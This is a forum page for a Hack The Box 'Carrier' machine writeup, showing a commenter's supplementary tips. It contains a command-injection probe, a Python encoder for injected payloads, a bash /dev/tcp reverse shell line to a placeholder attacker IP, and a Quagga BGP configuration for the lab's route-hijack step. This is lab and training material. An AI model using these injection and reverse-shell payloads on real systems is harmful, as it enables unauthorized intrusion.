HTB靶机渗透实战Writeup_Carrier

04-05 10:36

54

话题内容需要登录后才可查看与评论

精彩评论

kmahyyg

08-02 23:46

感谢大佬的辛勤付出。

补充一些我在做这题的时候遇到的东西:

  • 关于 SNMP 协议的 OID

OID Repository: http://oid-info.com

这里有各个厂商的 OID 信息,大家可自行取悦。

image

  • 关于反向 Shell

此处反向 Shell 的代码编写主要可以先用 ;pwd 这个 user input payload 探测,得到了这样的结果:

9.png

可以看到原本这条命令的样式是如上图所示的,所以本题除了利用 meterpreter 之外,可以选用一点 More OSCP Way,

from urllib.parse import quote_plus as urlencode
from base64 import b64encode
plbase = "quagga "
# usript is your user payload input
usript = "| ls"
payload = plbase + usript + " "
print(urlencode(b64encode(payload.encode()).decode()))

这里的 user input payload 还可以是: && bash -i >& /dev/tcp/ATTACKER IP/ATTCKER PORT 0>&1

题外:这题用 Meterpreter 方便多了...

  • 关于 Quagga BGPD 的配置

大佬用的 vtysh 的配置方法,我这里没有生效(输入命令没有报错,但是也没有写入配置文件,更没有生效)

所以,也可以直接修改配置文件 /etc/quagga/bgpd.conf 为以下内容,之后别忘了用 systemctl restart quagga 重启服务:

!
! Zebra configuration saved from vty
!   2018/07/02 02:14:27
!
route-map to-as200 permit 10
route-map to-as300 permit 10
!
router bgp 100
 bgp router-id 10.255.255.1
 network 10.101.8.0/21
 network 10.101.16.0/21
 network 10.120.15.0/25
 redistribute connected
 neighbor 10.78.10.2 remote-as 200
 neighbor 10.78.11.2 remote-as 300
 neighbor 10.78.10.2 route-map to-as200 out
 neighbor 10.78.11.2 route-map to-as300 out
!
line vty
!

目录

  • 暂无目录